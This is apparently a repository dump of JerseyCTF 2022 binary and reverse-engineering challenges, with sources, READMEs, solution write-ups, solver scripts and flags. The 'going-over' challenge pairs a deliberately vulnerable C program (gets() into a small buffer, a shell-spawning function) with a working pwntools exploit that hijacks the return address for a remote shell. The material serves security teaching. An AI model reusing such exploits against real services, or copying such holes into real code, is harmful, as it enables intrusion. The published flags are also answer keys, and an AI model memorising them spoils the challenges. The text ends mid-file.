-------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from z3 import * 4 | 5 | # Array of 32 bit vectors, one for each character 6 | flag = tuple(BitVec(f'c{i}', 8) for i in range(32)) 7 | # This is the one we actually modify 8 | inp = list(flag) 9 | # Expected result, exported from Ghidra 10 | exp = [0x6a, 0x63, 0x39, 0x30, 0x2e, 0x2b, 0x34, 0x4e, 0x4c, 0x1b, 0x4f, 0x2d, 0x5b, 0xb, 0x79, 0x1c, 0x20, 0x7b, 0xa, 0x6b, 0x4f, 0x20, 0x11, 0x72, 0x70, 0x23, 0x63, 0x77, 0x18, 0x3a, 0x6a, 0x5e] 11 | 12 | # Sanity check to make sure I copied this properly 13 | assert(len(exp) == 32) 14 | 15 | # Helper function to swap 2 elements of inp 16 | def swap(i, j): 17 | inp[i], inp[j] = inp[j], inp[i] 18 | 19 | # Copy of func1; we'll model func2 as a generator and use `next` to pass control to it 20 | def func1(): 21 | g = func2() 22 | for i in range(6, 0x1c): 23 | inp[i] ^= 0x37 24 | if i == 0x10: 25 | next(g) 26 | swap(5, 24) 27 | for i in range(3, 0x16): 28 | inp[i] ^= inp[i-1] 29 | if i == 7: 30 | next(g) 31 | swap(6, 9) 32 | for i in range(0xd, 0x1e): 33 | swap(i, 12) 34 | if i == 0x15: 35 | next(g) 36 | swap(15, 27) 37 | # In the binary, the context for func1 returns to the context for func2; 38 | # to simulate this, we pass control to func2 one last time 39 | next(g) 40 | 41 | # Copy of func2; we'll use `yield` to pass control back to func1 42 | def func2(): 43 | for i in range(3, 0x1d): 44 | swap(i, 2) 45 | if i == 0xb: 46 | yield 47 | swap(11, 20) 48 | for i in range(0xc, 0x20): 49 | inp[i] ^= inp[i-1] 50 | if i == 0x14: 51 | yield 52 | swap(30, 27) 53 | for i in range(4, 0x12): 54 | inp[i] ^= 0x78 55 | if i == 0xe: 56 | yield 57 | swap(25, 28) 58 | # In the binary, the context for func2 returns directly to the context for main; 59 | # we simulate this by returning control to func1, which then returns to main 60 | yield 61 | 62 | func1() 63 | 64 | # Create the solver and add the constraints 65 | s = Solver() 66 | for a, b in zip(inp, exp): 67 | s.add(a == b) 68 | 69 | # Assert that the solver found a solution 70 | assert(s.check() == sat) 71 | 72 | model = s.model() 73 | 74 | # Get the value the solver assigned to each character and combine them into a byte string 75 | flag = bytes(model[c].as_long() for c in flag) 76 | print(flag) 77 | -------------------------------------------------------------------------------- /bin/going-over/README.md: -------------------------------------------------------------------------------- 1 | # going-over 2 | 3 | ## Challenge Text 4 | * My friends said they were going on a trip but I think they ran into some trouble... nc 0.cloud.chals.io 10197 5 | * They sent me these two files before we lost contact ([src.c](challenge/files/src.c) and [going-over](challenge/going-over)) 6 | 7 | ## Hint 8 | * If only there were a way to find the exact location of the ledge... like if the ledge had an address or something 9 | 10 | ## Solution 11 | * Use pwntools to print `cyclic(100)`, which will return a long string we can use to test buffer overflow (line 7 of `solver.py`) 12 | * Use pwntools to run `going-over` (line 3 of `solver.py`) 13 | * The terminal will say the process is running and output a `pid` 14 | * Run `gdb ./going-over -p [pid]` in a separate terminal 15 | * Run the process in gdb and paste the long string from earlier 16 | * The program will segfault and you can examine which part of the string overwrote the return pointer with `x/xw $rsp` 17 | * We see that `faaa` overwrote the return pointer 18 | * Run `objdump -d going-over | grep grab_ledge` in a terminal to get the address of the `grab_ledge()` function (on my machine, it is `0x4011b6`) 19 | * Use pwntools to get the proper padding with `cyclic_find("faaa")` 20 | * Connect to the server and port (line 5 of `solver.py`) 21 | * Send the proper padding and the return address (lines 8-11 of `solver.py`) 22 | * A shell is created and then you can do `cat flag.txt` to read the flag file 23 | * Flag: `jctf{ph3w_ju57_1n_71m3}` 24 | 25 | ## Credit 26 | * Developed by Penelope 27 | -------------------------------------------------------------------------------- /bin/going-over/challenge/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu@sha256:86ac87f73641c920fb42cc9612d4fb57b5626b56ea2a19b894d0673fd5b4f2e9 AS build 2 | 3 | RUN apt-get update -y && \ 4 | apt-get install -y gcc && \ 5 | rm -rf /var/lib/apt/lists/* 6 | 7 | COPY /files/src.c . 8 | RUN gcc src.c -o going-over -fno-stack-protector -no-pie 9 | 10 | FROM ubuntu@sha256:86ac87f73641c920fb42cc9612d4fb57b5626b56ea2a19b894d0673fd5b4f2e9 11 | 12 | RUN useradd -m -d /home/jersey -u 12345 jersey 13 | WORKDIR /home/jersey 14 | 15 | RUN mkdir /home/jersey/bin && \ 16 | cp /bin/sh /home/jersey/bin && \ 17 | cp /bin/ls /home/jersey/bin && \ 18 | cp /bin/cat /home/jersey/bin 19 | 20 | COPY ynetd . 21 | RUN chmod +x ynetd 22 | 23 | COPY --from=build going-over going-over 24 | COPY /files/flag.txt /home/jersey/ 25 | 26 | RUN chmod a-w /tmp 27 | 28 | RUN chmod a-w /home/jersey 29 | 30 | RUN chown -R root:root /home/jersey 31 | 32 | USER jersey 33 | EXPOSE 9999 34 | CMD ./ynetd -p 9999 ./going-over 35 | -------------------------------------------------------------------------------- /bin/going-over/challenge/files/flag.txt: -------------------------------------------------------------------------------- 1 | jctf{ph3w_ju57_1n_71m3} -------------------------------------------------------------------------------- /bin/going-over/challenge/files/src.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | void grab_ledge() 5 | { 6 | puts("ayy we made it"); 7 | execve("/bin/sh", NULL, NULL); 8 | } 9 | 10 | int main(void) 11 | { 12 | char action[12]; 13 | 14 | setvbuf(stdout, NULL, _IONBF, 0); 15 | setvbuf(stdin, NULL, _IONBF, 0); 16 | setvbuf(stderr, NULL, _IONBF, 0); 17 | 18 | puts("We thought it was a good idea to go white-water rafting..."); 19 | puts("but now we're about to go over a waterfall!!"); 20 | puts("HELP!!!!!"); 21 | puts("The map said there was a ledge nearby that we could escape to but I can't find it!!!"); 22 | 23 | gets(action); 24 | printf("Let's try this %s and hope it works D:\n", action); 25 | } -------------------------------------------------------------------------------- /bin/going-over/challenge/going-over: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/bin/going-over/challenge/going-over -------------------------------------------------------------------------------- /bin/going-over/challenge/solver.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | # p = process("./realone") 4 | # input("Attach GDB") 5 | p = remote("[server]", [port]) 6 | 7 | # padding = cyclic(100) 8 | padding = b"A" * cyclic_find("faaa") 9 | pointer = p64(0x4011b6) 10 | 11 | p.send(padding + pointer) 12 | 13 | p.interactive() -------------------------------------------------------------------------------- /bin/going-over/challenge/ynetd: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/bin/going-over/challenge/ynetd -------------------------------------------------------------------------------- /bin/kangaroo/README.md: -------------------------------------------------------------------------------- 1 | # kangaroo 2 | 3 | ## Challenge Text 4 | * I'm feeling pretty JUMPY today. Can you give me a nice flag to JUMP on? 5 | 6 | ## Hint 7 | * There's a lot of code, but most of it seems pretty similar. Try to look at the bigger picture. 8 | 9 | ## Solution 10 | Reverse engineering challenge obfuscated with the `setjmp` and `longjmp` functions 11 | 12 | The structure of the binary is essentially a long list of blocks initialized with `setjmp`, 13 | followed by a `longjmp` to the one called `start`. 14 | Pretty much all of the variables in this program are global, and have their names exported with the binary. 15 | Most of the blocks fall into one of two categories: 16 | 17 | * "State" blocks, which set the global `nxstate`, call `permute`, and `longjmp` to a block called `control` 18 | * "Transform" blocks, which apply some transformation to the global buffer `flags`, then `longjmp` to one of the state blocks (determined by `nxstate`) 19 | 20 | There are also a few other special blocks: 21 | 22 | * `start` prints out the initial prompt, then copies `argv[1]` into `flag` and its length into `flag_len`, ensuring that it exists and isn't an empty string, 23 | then finally jumps to the first state block 24 | * `accept` prints a message indicating that the input was accepted, then exits 25 | * `reject` prints a message indicating that the input was rejected, then exits 26 | * `control` increments `flag` and `flag_len` by 1 (effectively cutting off the first character), 27 | then `longjmp`s to one of the transform blocks if the buffer isn't empty, 28 | or to either `accept` or `reject` if it is 29 | 30 | Basically, it's a finite state machine that also transforms the flag as it examines it. 31 | The control flow goes something like this: 32 | 33 | 1. `start` reads in the input and jumps to the first state 34 | 2. Each state checks the first character of the current buffer, then sets `nxstate` based on the current state and character, 35 | based on a global array called `jumps` 36 | 3. Each state also calls `permute` on the global array `transform_inds`, with a parameter from the `perms` array based on the current state 37 | * Each `perm` is a permutation of the numbers 0-7; `permute` applies the same permutation to its first argument 38 | 4. Then, each state `longjmp`s to `control` 39 | 5. `control` first cuts the first character off of the buffer 40 | 6. Then, if the buffer isn't empty: 41 | * `control` jumps to a transform block, which is chosen by `transforms[transform_inds[0]]` 42 | * There are 8 transform blocks, each of which either shuffles the bytes around, adds some value to all of the bytes mod 256, 43 | XORs every byte with some value, or some combination of these 44 | * Then, each transform block jumps to the state given by `states[nxstate]`, cycling back to step 2 with the next character 45 | 7. If the buffer is empty, `control` checks `accepts[nxstate]` to see if the next state is an "accept" state; 46 | if it is, it jumps to `accept`, if it isn't, it jumps to `reject` 47 | 48 | There are way too many states for us to reason about this manually. 49 | Luckily, most of the relevant information is stored in a few giant global arrays, so we can just dump those and analyze them in Python. 50 | I used Ghidra's copy bytes option, the result is in the (solution folder)[sol]. 51 | Now, after looking at the data a little bit there are a few things that we can see: 52 | 53 | * Not all of the states are reachable from state 0, so we can completely ignore the ones that aren't 54 | * There's only one reachable accept state, which means we *have* to get to that state for our string to be accepted 55 | * There's only one reachable state that can jump to that state, and only one reachable state that can jump to *that* one, 56 | and so on all the way back to state 0; this means that there's exactly one possible route through the program that ends in an accept state 57 | 58 | Now we can recover the flag by doing the following: 59 | 60 | * Figure out the route we need to take for the string to be accepted 61 | * Figure out what transformation is applied at each step (since this is independent of the input) 62 | * This involves running through the route forwards to see how the transformations are permuted at each step 63 | * Run through the route backwards to construct the flag; this involves 2 parts: 64 | 1. Undo the transformation applied at this step 65 | 2. Prepend the byte that would send us to the next state in the route 66 | 67 | The [solution folder](sol) includes a commented Python script with more details. 68 | 69 | * Flag: `jctf{h1PpiTy_H0PP1tY_a95c4603}` 70 | 71 | ## Credit 72 | * Developed by [ContronThePanda](https://github.com/PAndaContron), part of [RUSEC](https://rusec.github.io/). 73 | -------------------------------------------------------------------------------- /bin/kangaroo/challenge/kangaroo: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/bin/kangaroo/challenge/kangaroo -------------------------------------------------------------------------------- /bin/kangaroo/kangaroo-gen.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/bin/kangaroo/kangaroo-gen.tar.gz -------------------------------------------------------------------------------- /bin/kangaroo/sol/accepts.txt: -------------------------------------------------------------------------------- 1 | 0000000000000000010001000000000000000000000100000000000000000000000000000000000000000000010000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000010101000000000100000000000100000000000000000000000000 2 | -------------------------------------------------------------------------------- /bin/kangaroo/sol/perms.txt: -------------------------------------------------------------------------------- 1 | 01060005020307040607020301000405010007050203060407000204050301060305070204010600040200030106070501000602050407030006020703050401030001070504020601060403050702000600030405010207060105020007040300020506040103070702030501060400070005020603040102070100060504030602070001050304020704060500030105030700020106040503000207040106040302070005010601050206000304070205040601070003020307000604010504020003050607010605030207040001050403060102000705010600020704030602010700030504060407010003020503070601050400020700050601020304040500060102030700010706040503020103020605040700060400030705010205070106040002030601020704030005050002060107030401020407050600030206030007040105000401070503020606020001030407050102040706050300050304060102000703040205070001060302000406010705040500060702030106020304050701000003020504070106030001050702060405070301060402000700040501060302030107000506020400010504030702060006010405030207030204070100050604070500010203060701040205060300020307060100040501030604000507020503000104020706040005070301020606040201050703000600020401030705070001030406050205000702060304010107050306000402000406030701020500050401070306020700050102040603060705020301000407000204030601050302010006070504000401060703020500040603050102070705040002010603050401020703060002030706010500040204050706030001020107000504060300030105070602040306070201000405030206000501040705060002030104070206000503040701070006010405030207030004050106020705040100060203000205010403060700070406030105020504060207010300020704050306010006000302040501070100040602070305000702030106040505060402030100070703020104000605020407010006030504000507020301060100070605020403070203050104000603060005070401020207040605010300020506000403070103010700040206050602050300040701050001070302040604060207010003050604050302010700070305020406010005040007020603010602030704000105010007060503020402010503040007060302070105040600000107030204050605000307010602040002060104050307070304020500010601030406050007020701000604030502050204060703010007010305040602000002050107060403020401000506030700070504030601020504000703020106 2 | -------------------------------------------------------------------------------- /bin/kangaroo/sol/solution.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | from struct import unpack 4 | from binascii import unhexlify 5 | 6 | # Helper function; loads data dumped from Ghidra as "Byte String (no spaces)" 7 | def load_dump(filename): 8 | with open(filename, 'r') as f: 9 | dump = f.read().strip() 10 | return unhexlify(dump) 11 | 12 | # Load the data for the 3 global arrays 13 | jumps_dump = load_dump('jumps.txt') 14 | perms_dump = load_dump('perms.txt') 15 | accepts_dump = load_dump('accepts.txt') 16 | 17 | # Unpack this data into the right type 18 | # Sidenote: tuples are basically just immutable lists in Python, 19 | # so I tend to use them anywhere I have a list I'm not going to modify for the sake of clarity 20 | jumps = unpack(f'<{128*256}I', jumps_dump) 21 | jumps = tuple(jumps[i:i+256] for i in range(0, 128*256, 256)) 22 | 23 | perms = unpack(f'<{128*8}B', perms_dump) 24 | perms = tuple(perms[i:i+8] for i in range(0, 128*8, 8)) 25 | 26 | accepts = tuple(bool(x) for x in accepts_dump) 27 | 28 | # First, we want to figure out which states are actually reachable at all 29 | reachable = set() 30 | # We can also get the (reachable) parents of each state, 31 | # i.e. the states that can jump directly to that state 32 | parents = tuple(set() for i in range(128)) 33 | 34 | # We use a recursive function to do a depth-first search on the jumps array 35 | def add_reachable(ind): 36 | global jumps, reachable, parents 37 | reachable.add(ind) 38 | for i in jumps[ind]: 39 | parents[i].add(ind) 40 | if i not in reachable: 41 | add_reachable(i) 42 | 43 | # Initial state is always 0 so we start there 44 | add_reachable(0) 45 | 46 | # Get a set of all of the reachable accept states 47 | final = {i for i in reachable if accepts[i]} 48 | # You can verify by printing the above set that this assertion is true; 49 | # that is, we only have one reachable accept state 50 | # That means that this *must* be the state we end in 51 | assert(len(final) == 1) 52 | final = next(iter(final)) 53 | 54 | # We can verify by examining the jump table that the final state has exactly one parent, 55 | # and all of its ancestors also have exactly one parent, going all the way back to state 0 56 | # This means that there is exactly one "route" through the states that results in our input being accepted 57 | route = [final] 58 | # State 0 is the first state, so we keep prepending to the route until we get to 0 59 | while route[0]: 60 | assert(len(parents[route[0]]) == 1) 61 | route.insert(0, next(iter(parents[route[0]]))) 62 | route = tuple(route) 63 | 64 | # Helper function to cycle a list backwards; returns a copy of the list 65 | def invcycle(buff): 66 | buff = buff[::-1] 67 | for i in range(1, len(buff)): 68 | tmp = buff[0] 69 | buff[0] = buff[i] 70 | buff[i] = tmp 71 | buff = buff[::-1] 72 | return buff 73 | 74 | # Now we create inverses of all the transformations; 75 | # we'll use these to run through the route backwards and reconstruct the flag 76 | def invtrans0(buff): 77 | for _ in range(5): 78 | buff[:] = invcycle(buff) 79 | 80 | def invtrans1(buff): 81 | for i in range(0, len(buff), 4): 82 | buff[i:i+4] = invcycle(buff[i:i+4]) 83 | 84 | def invtrans2(buff): 85 | for i in range(len(buff)): 86 | buff[i] = (buff[i] + 256 - 0x5D) & 0xFF 87 | 88 | def invtrans3(buff): 89 | for i in range(len(buff)): 90 | buff[i] ^= 0x1c 91 | 92 | def invtrans4(buff): 93 | for i in range(len(buff)): 94 | buff[i] = (buff[i] + 256 - 0x65) & 0xFF 95 | for _ in range(4): 96 | buff[:] = invcycle(buff) 97 | 98 | def invtrans5(buff): 99 | for i in range(len(buff)): 100 | buff[i] = (buff[i] + 256 - 0xAD) & 0xFF 101 | for i in range(0, len(buff), 3): 102 | buff[i:i+3] = invcycle(buff[i:i+3]) 103 | 104 | def invtrans6(buff): 105 | for i in range(len(buff)): 106 | buff[i] = (buff[i] + 256 - 0x18) & 0xFF 107 | for i in range(len(buff)): 108 | buff[i] ^= 0x65 109 | 110 | def invtrans7(buff): 111 | for i in range(len(buff)): 112 | buff[i] = (buff[i] + 256 - 0xBE) & 0xFF 113 | for _ in range(3): 114 | buff[:] = invcycle(buff) 115 | 116 | # In order to get the transform applied at each state, 117 | # we'll run through the route forwards and apply each permutation to this list 118 | curr_transforms = [invtrans0, invtrans1, invtrans2, invtrans3, invtrans4, invtrans5, invtrans6, invtrans7] 119 | 120 | # Helper function that does exactly the same thing as the version from the binary, 121 | # except that perm isn't reset at the end because we make a copy of it pretty trivially anyway, 122 | # and it works for lengths other than 8 123 | def permute(arr, perm): 124 | assert(len(arr) == len(perm)) 125 | assert(set(perm) == set(range(len(perm)))) 126 | for i in range(len(arr)): 127 | j = i 128 | while perm[j] >= 0: 129 | swp = arr[i] 130 | arr[i] = arr[perm[j]] 131 | arr[perm[j]] = swp 132 | 133 | tmp = perm[j] 134 | perm[j] -= len(perm) 135 | j = tmp 136 | 137 | # This holds the transformations applied to the remainder of the flag after each step 138 | # (Technically it holds the inverse of each transform) 139 | transforms = [] 140 | # We don't need the last 2 states' transformations because those are never applied 141 | for state in route[:-2]: 142 | # The binary applies the permutation, then applies the first transformation to the flag buffer; 143 | # we'll just save the first transformation to our list 144 | permute(curr_transforms, list(perms[state])) 145 | transforms.append(curr_transforms[0]) 146 | transforms = tuple(transforms) 147 | 148 | # Now, we can reconstruct the flag by essentially simulating the route backwards 149 | flag = [] 150 | for i in range(len(route)-2, -1, -1): 151 | # If the flag isn't empty, we apply the inverse of this state's transform to it 152 | if len(flag): 153 | transforms[i](flag) 154 | # Then, we figure out which jump would have to be taken to get to the next state in the route, 155 | # and prepend the byte that would make it take that jump 156 | flag.insert(0, jumps[route[i]].index(route[i+1])) 157 | flag = bytes(flag) 158 | print(flag) 159 | -------------------------------------------------------------------------------- /bin/misdirection/README.md: -------------------------------------------------------------------------------- 1 | # misdirection 2 | 3 | ## Challenge Text 4 | * Where'd the flag go? 5 | 6 | ## Hint 7 | * There are many ways to solve this challenge, some of which are much easier than others. 8 | 9 | ## Solution 10 | Simple challenge about file descriptors 11 | 12 | This binary XORs 2 arrays together and uses `write` to write the result to file descriptor 5. 13 | This result is (presumably) the flag. 14 | 15 | A file descriptor is basically just an integer that identifies an open file within a process. 16 | By default, file descriptor 0 is `stdin`, 1 is `stdout`, and 2 is `stderr`. 17 | 18 | File descriptor 5 isn't open by default, and the program never opens it, so this will result in an error if the program is run normally 19 | (the binary never actually checks if the call succeeded, so we don't see this error). 20 | 21 | There are a few ways we can get the flag. 22 | We can use `./misdirection 5>&1`; this uses Bash syntax to redirect FD 5 to FD 1, 23 | which is standard output, so the output gets printed to our terminal. 24 | 25 | We can also use `ltrace -s 9999 ./misdirection`, or `strace -s 9999 ./misdirection`. 26 | `ltrace` and `strace` are commands that print out every library call and system call a program makes respectively. 27 | This way, we can see the call to `write` when it happens, even if it doesn't succeed. 28 | By default, these commands only print the first 32 characters of a string; 29 | `-s 9999` increases this limit to 9999. 30 | 31 | There are a few other ways to solve this challenge: we could use a debugger, set a breakpoint, and get the flag from memory, 32 | or we could copy the arrays from the binary and XOR them ourselves, but that's way more work. 33 | 34 | * Flag: `jctf{l00k5_1iK3_u_f0Und_m3_018a09d6}` 35 | 36 | ## Credit 37 | * Developed by [ContronThePanda](https://github.com/PAndaContron), part of [RUSEC](https://rusec.github.io/). 38 | -------------------------------------------------------------------------------- /bin/misdirection/challenge/misdirection: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/bin/misdirection/challenge/misdirection -------------------------------------------------------------------------------- /bin/patches/README.md: -------------------------------------------------------------------------------- 1 | # patches 2 | 3 | ## Challenge Text 4 | * Given an objdump of an executable, figure out what hexadecimal instructions are needed to nop to get the jctf flag to stdout 5 | 6 | ## Hint 7 | * The [Intel Manual](https://www.intel.com/content/dam/www/public/us/en/documents/manuals/64-ia-32-architectures-software-developer-instruction-set-reference-manual-325383.pdf) might be overkill, but maybe reviewing Intel Assembly and their corresponding opcodes might help to crack the challenge. **Simply enter the opcodes** 8 | 9 | ## Solution 10 | * Follow the Control Flow to Determine what opcode you have to nop 11 | * Flag: `jctf{7e0a}` 12 | 13 | ## Credit 14 | * Developed by [Andres](https://github.com/AOrps) 15 | -------------------------------------------------------------------------------- /bin/patches/challenge/Makefile: -------------------------------------------------------------------------------- 1 | SHELL=/bin/bash 2 | 3 | all = compile 4 | 5 | compile: 6 | @gcc -o patches patches.c 7 | 8 | dump: compile 9 | @touch dump.txt 10 | # Get the .rodata section from Executable 11 | @objdump -s -j .rodata patches >> dump.txt 12 | @printf "\n" >> dump.txt 13 | # Get Intel Assembly Syntax on the main function 14 | @objdump -M intel -d patches | awk -v RS= '/^[[:xdigit:]]+

/' >> dump.txt 15 | @printf "\n" >> dump.txt 16 | @objdump -M intel -d patches | awk -v RS= '/^[[:xdigit:]]+ /' >> dump.txt 17 | @printf "\n" >> dump.txt 18 | @objdump -M intel -d patches | awk -v RS= '/^[[:xdigit:]]+ /' >> dump.txt 19 | # Show output 20 | @cat dump.txt 21 | 22 | clean: 23 | ifneq (,$(wildcard ./a.out)) 24 | @rm ./a.out 25 | endif 26 | ifneq (,$(wildcard ./patches)) 27 | @rm ./patches 28 | endif 29 | ifneq (,$(wildcard ./dump.txt)) 30 | @rm dump.txt 31 | endif -------------------------------------------------------------------------------- /bin/patches/challenge/dump.txt: -------------------------------------------------------------------------------- 1 | 2 | patches: file format elf64-x86-64 3 | 4 | Contents of section .rodata: 5 | 2000 01000200 00000000 6a637466 7b4e494c ........jctf{NIL 6 | 2010 7d006e69 6c206275 73746572 00706174 }.nil buster.pat 7 | 2020 63686573 2d6f686f 756c6968 616e0000 ches-ohoulihan.. 8 | 2030 69662d79 6f752d63 616e2d64 6f646765 if-you-can-dodge 9 | 2040 2d612d77 72656e63 682d796f 752d6361 -a-wrench-you-ca 10 | 2050 6e2d646f 6467652d 612d6261 6c6c00 n-dodge-a-ball. 11 | 12 | 0000000000001177
: 13 | 1177: f3 0f 1e fa endbr64 14 | 117b: 55 push rbp 15 | 117c: 48 89 e5 mov rbp,rsp 16 | 117f: 48 83 ec 30 sub rsp,0x30 17 | 1183: 89 7d dc mov DWORD PTR [rbp-0x24],edi 18 | 1186: 48 89 75 d0 mov QWORD PTR [rbp-0x30],rsi 19 | 118a: 48 8d 05 8c 0e 00 00 lea rax,[rip+0xe8c] # 201d <_IO_stdin_used+0x1d> 20 | 1191: 48 89 45 f0 mov QWORD PTR [rbp-0x10],rax 21 | 1195: 48 8d 05 94 0e 00 00 lea rax,[rip+0xe94] # 2030 <_IO_stdin_used+0x30> 22 | 119c: 48 89 45 f8 mov QWORD PTR [rbp-0x8],rax 23 | 11a0: c7 45 ec 00 00 00 00 mov DWORD PTR [rbp-0x14],0x0 24 | 11a7: eb 1e jmp 11c7 25 | 11a9: 83 7d ec 1d cmp DWORD PTR [rbp-0x14],0x1d 26 | 11ad: 7e 0a jle 11b9 27 | 11af: b8 00 00 00 00 mov eax,0x0 28 | 11b4: e8 90 ff ff ff call 1149 29 | 11b9: b8 00 00 00 00 mov eax,0x0 30 | 11be: e8 9d ff ff ff call 1160 31 | 11c3: 83 45 ec 01 add DWORD PTR [rbp-0x14],0x1 32 | 11c7: 83 7d ec 16 cmp DWORD PTR [rbp-0x14],0x16 33 | 11cb: 7e dc jle 11a9 34 | 11cd: b8 00 00 00 00 mov eax,0x0 35 | 11d2: c9 leave 36 | 11d3: c3 ret 37 | 11d4: 66 2e 0f 1f 84 00 00 nop WORD PTR cs:[rax+rax*1+0x0] 38 | 11db: 00 00 00 39 | 11de: 66 90 xchg ax,ax 40 | 41 | 0000000000001149 : 42 | 1149: f3 0f 1e fa endbr64 43 | 114d: 55 push rbp 44 | 114e: 48 89 e5 mov rbp,rsp 45 | 1151: 48 8d 3d b0 0e 00 00 lea rdi,[rip+0xeb0] # 2008 <_IO_stdin_used+0x8> 46 | 1158: e8 f3 fe ff ff call 1050 47 | 115d: 90 nop 48 | 115e: 5d pop rbp 49 | 115f: c3 ret 50 | 51 | 0000000000001160 : 52 | 1160: f3 0f 1e fa endbr64 53 | 1164: 55 push rbp 54 | 1165: 48 89 e5 mov rbp,rsp 55 | 1168: 48 8d 3d a3 0e 00 00 lea rdi,[rip+0xea3] # 2012 <_IO_stdin_used+0x12> 56 | 116f: e8 dc fe ff ff call 1050 57 | 1174: 90 nop 58 | 1175: 5d pop rbp 59 | 1176: c3 ret 60 | -------------------------------------------------------------------------------- /bin/patches/challenge/patches: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/bin/patches/challenge/patches -------------------------------------------------------------------------------- /bin/patches/challenge/patches.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | 4 | void a() { 5 | puts("jctf{NIL}"); 6 | } 7 | 8 | void b() { 9 | puts("nil buster"); 10 | } 11 | 12 | int main(int argc, char* argv[]) { 13 | 14 | int i; 15 | 16 | char* flag = "patches-ohoulihan"; 17 | char* what = "if-you-can-dodge-a-wrench-you-can-dodge-a-ball"; 18 | 19 | for(i = 0; i < 23; i++){ 20 | if( i >= 30) { 21 | a(); 22 | } 23 | b(); 24 | 25 | } 26 | 27 | return 0; 28 | } -------------------------------------------------------------------------------- /bin/symbolism/challenge/symbolism.vbin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/njitacm/jerseyctf-2022-challenges/393bdc79a7c8bf604e0745c0a89974bbfb6d1a12/bin/symbolism/challenge/symbolism.vbin -------------------------------------------------------------------------------- /bin/symbolism/symbolism.lisp: -------------------------------------------------------------------------------- 1 | (defun char-map (c) 2 | (case c 3 | (#\Space 941) 4 | (#\! 18) 5 | (#\" 583) 6 | (#\# 2035) 7 | (#\$ 52) 8 | (#\% 913) 9 | (#\& 1126) 10 | (#\' 2920) 11 | (#\( 2288) 12 | (#\) 1954) 13 | (#\* 3412) 14 | (#\+ 1665) 15 | (#\, 1597) 16 | (#\- 3662) 17 | (#\. 3701) 18 | (#\/ 3601) 19 | (#\0 2123) 20 | (#\1 3828) 21 | (#\2 167) 22 | (#\3 2421) 23 | (#\4 2544) 24 | (#\5 504) 25 | (#\6 1589) 26 | (#\7 1887) 27 | (#\8 192) 28 | (#\9 3928) 29 | (#\: 1111) 30 | (#\; 243) 31 | (#\< 1101) 32 | (#\= 3131) 33 | (#\> 112) 34 | (#\? 2959) 35 | (#\@ 2208) 36 | (#\A 1805) 37 | (#\B 1772) 38 | (#\C 232) 39 | (#\D 3998) 40 | (#\E 2534) 41 | (#\F 1609) 42 | (#\G 1024) 43 | (#\H 3721) 44 | (#\I 1832) 45 | (#\J 241) 46 | (#\K 2213) 47 | (#\L 2917) 48 | (#\M 3199) 49 | (#\N 1415) 50 | (#\O 3242) 51 | (#\P 561) 52 | (#\Q 1038) 53 | (#\R 3934) 54 | (#\S 278) 55 | (#\T 3257) 56 | (#\U 753) 57 | (#\V 2724) 58 | (#\W 128) 59 | (#\X 572) 60 | (#\Y 332) 61 | (#\Z 3536) 62 | (#\[ 1856) 63 | (#\\ 2018) 64 | (#\] 2291) 65 | (#\^ 284) 66 | (#\_ 2692) 67 | (#\` 71) 68 | (#\a 2642) 69 | (#\b 1340) 70 | (#\c 3238) 71 | (#\d 1939) 72 | (#\e 2491) 73 | (#\f 2605) 74 | (#\g 3092) 75 | (#\h 2029) 76 | (#\i 3768) 77 | (#\j 3112) 78 | (#\k 2053) 79 | (#\l 3875) 80 | (#\m 3434) 81 | (#\n 2820) 82 | (#\o 3107) 83 | (#\p 3932) 84 | (#\q 910) 85 | (#\r 3218) 86 | (#\s 1426) 87 | (#\t 1661) 88 | (#\u 3311) 89 | (#\v 3303) 90 | (#\w 2016) 91 | (#\x 366) 92 | (#\y 1304) 93 | (#\z 3644) 94 | (#\{ 1078) 95 | (#\| 3226) 96 | (#\} 3025) 97 | (#\~ 1684) 98 | (otherwise 0))) 99 | 100 | (defun gen-key-h (s) 101 | (let* ( 102 | (s1 (reverse s)) 103 | (s2 (map 'list (lambda (i) (+ (* -4 i i) (* 7 i) -2)) s1)) 104 | (s3 (map 'list (lambda (i) (elt s2 i)) 105 | '(46 28 40 39 2 27 18 23 31 16 29 48 38 12 35 42 32 49 19 21 14 3 34 5 30 13 4 7 25 22 8 11 50 47 41 15 1 36 33 17 10 37 0 43 44 26 45 20 24 6 51 9))) 106 | (s4 (map 'list '+ s3 (append (cdr s3) (list (car s3))))) 107 | (s5 s4) 108 | (s6 s5) 109 | (s7 (map 'list (lambda (i) (elt s6 i)) 110 | '(18 31 4 13 39 36 3 19 1 8 22 16 5 30 23 0 7 48 46 20 26 6 24 10 41 49 9 34 2 12 37 28 51 50 15 47 40 32 27 42 33 35 25 43 11 45 38 29 17 44 21 14))) 111 | (s8 (map 'list (lambda (x) (* x x x)) s7)) 112 | (s9 (map 'list #'abs s8)) 113 | (s10 (map 'list #'logxor s9 (append (cdr s9) (list (car s9))))) 114 | (s11 (map 'list #'isqrt s10)) 115 | (s12 (map 'list (lambda (x) (* x x x)) s11)) 116 | (s13 s12) 117 | (s14 (map 'list '- s13 s2)) 118 | (s15 (map 'list #'abs s14)) 119 | (s16 (map 'list (lambda (x) (logand x 4095)) s15))) 120 | s16)) 121 | 122 | (defun gen-key (s) 123 | (loop for i from 1 to 512 do (setq s 